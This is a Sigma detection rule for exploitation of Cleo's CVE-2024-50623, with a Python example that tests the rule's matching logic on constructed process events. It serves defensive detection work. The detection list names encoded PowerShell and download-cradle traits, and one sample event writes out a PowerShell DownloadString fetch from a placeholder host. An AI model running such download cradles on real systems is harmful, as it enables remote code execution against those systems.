CVE-2024-50623 Exploitation Attempt - Cleo
Detects exploitation attempts against Cleo's CVE-2024-50623 by looking for a "cmd.exe" process spawned from the Cleo software suite with a suspicious PowerShell command line.
Sigma rule

```yaml
title: CVE-2024-50623 Exploitation Attempt - Cleo
id: f007b877-02e3-45b7-8501-1b78c2864029
status: experimental
description: |
    Detects exploitation attempt of Cleo's CVE-2024-50623 by looking for a "cmd.exe" process spawning from the Cleo software suite with suspicious PowerShell commandline.
references:
    - https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild
author: Tanner Filip, Austin Worline, Chad Hudson, Matt Anderson
date: 2024-12-09
tags:
    - attack.execution
    - attack.t1190
    - cve.2024-50623
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\javaw.exe'
        ParentCommandLine|contains:
            - 'Harmony'
            - 'lexicom'
            - 'VersaLex'
            - 'VLTrader'
        Image|endswith: '\cmd.exe'
        CommandLine|contains:
            - 'powershell'
            - ' -enc '
            - ' -EncodedCommand'
            - '.Download'
    condition: selection
falsepositives:
    - Unlikely
level: high
```
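To see how the selection above behaves on real telemetry, the following is an added example (not part of the SigmaHQ rule or of pySigma) that transcribes the `selection` map into plain Python and runs it over a few constructed process_creation events. It encodes the two semantics a reviewer should keep in mind when reading this rule: every field in a selection must match (AND), while a list of values under one field matches if any value matches (OR), and Sigma string matching is case-insensitive. The event field values, paths and the `<BASE64_PLACEHOLDER>` token are constructed for illustration and are not real telemetry.

```python
"""Added example: evaluate the rule's `selection` map against constructed
process_creation events. Illustrative code, not SigmaHQ's or pySigma's."""

# Field -> (modifier, values), transcribed from the rule's `selection`.
SELECTION = {
    "ParentImage": ("endswith", ["\\javaw.exe"]),
    "ParentCommandLine": ("contains", ["Harmony", "lexicom", "VersaLex", "VLTrader"]),
    "Image": ("endswith", ["\\cmd.exe"]),
    "CommandLine": ("contains", ["powershell", " -enc ", " -EncodedCommand", ".Download"]),
}


def _field_matches(value, modifier, patterns):
    """Sigma string matching is case-insensitive; values in a list are OR-ed."""
    v = value.lower()
    for pattern in patterns:
        p = pattern.lower()
        if modifier == "endswith" and v.endswith(p):
            return True
        if modifier == "contains" and p in v:
            return True
    return False


def matches_selection(event, selection=SELECTION):
    """Every field of the selection map must match (AND); a missing field fails."""
    for field, (modifier, patterns) in selection.items():
        if field not in event:
            return False
        if not _field_matches(str(event[field]), modifier, patterns):
            return False
    return True


def run_rule(events):
    """Return the indices of events that would raise this alert (condition: selection)."""
    return [i for i, event in enumerate(events) if matches_selection(event)]


# Constructed sample events (assumed field names follow the Sigma process_creation schema).
SAMPLE_EVENTS = [
    {   # 0: Cleo's javaw.exe launching cmd.exe for a routine task; no PowerShell -> no alert
        "ParentImage": r"C:\VLTrader\jre\bin\javaw.exe",
        "ParentCommandLine": r'"C:\VLTrader\jre\bin\javaw.exe" -jar VLTrader.jar',
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"cmd.exe /c dir C:\VLTrader\logs",
    },
    {   # 1: same parent, child runs an encoded PowerShell command -> alert
        "ParentImage": r"C:\VLTrader\jre\bin\javaw.exe",
        "ParentCommandLine": r'"C:\VLTrader\jre\bin\javaw.exe" -jar VLTrader.jar',
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd.exe /c powershell -EncodedCommand <BASE64_PLACEHOLDER>",
    },
    {   # 2: encoded PowerShell, but the parent is explorer.exe, not Cleo's javaw -> no alert
        "ParentImage": r"C:\Windows\explorer.exe",
        "ParentCommandLine": "explorer.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd.exe /c powershell -enc <BASE64_PLACEHOLDER>",
    },
    {   # 3: Harmony parent, mixed-case "PowerShell" and ".DownloadString" -> alert
        "ParentImage": r"C:\Harmony\jre\bin\javaw.exe",
        "ParentCommandLine": r'"C:\Harmony\jre\bin\javaw.exe" -jar Harmony.jar',
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd.exe /c PowerShell -nop -c \"(New-Object Net.WebClient)"
                       ".DownloadString('http://example.invalid/x')\"",
    },
]


if __name__ == "__main__":
    for i in run_rule(SAMPLE_EVENTS):
        print(f"ALERT on event {i}: {SAMPLE_EVENTS[i]['CommandLine']}")
```

Event 2 is the case to keep in mind when tuning: an encoded PowerShell launch from an unrelated parent does not trigger this rule, because the `ParentImage` and `ParentCommandLine` constraints are what tie the alert to the Cleo products; conversely, event 0 shows that Cleo spawning cmd.exe on its own is not enough, so the `falsepositives: Unlikely` claim rests on the PowerShell-related substrings in `CommandLine`.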
References
- https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild
Related rules
- CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux)
- CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows)
- Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code Execution
- DNS RCE CVE-2020-1350
- Exploited CVE-2020-10189 Zoho ManageEngine